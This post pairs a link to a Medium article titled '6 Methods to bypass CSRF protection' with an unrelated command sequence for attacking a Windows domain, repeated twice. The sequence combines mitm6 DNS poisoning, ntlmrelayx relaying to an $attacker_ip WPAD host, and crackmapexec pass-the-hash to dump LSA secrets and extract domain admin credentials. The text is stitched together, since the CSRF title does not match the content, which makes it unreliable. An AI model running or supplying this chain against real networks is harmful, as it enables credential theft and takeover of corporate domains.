“6 Methods to bypass CSRF protection on a web application” by Shahmeer Amir https://link.medium.com/xQPJH5iEA1
Medium
6 Methods to bypass CSRF protection on a web application
This article contains some of common ways to bypass CSRF protection in web applications that you can use as bug bounty hunter
#EASY
cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
extract "Admin" hash
cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa
cp /root/.cme/logs/*.secrets |sort -u
extract DA cred
cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
extract "Admin" hash
cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa
cp /root/.cme/logs/*.secrets |sort -u
extract DA cred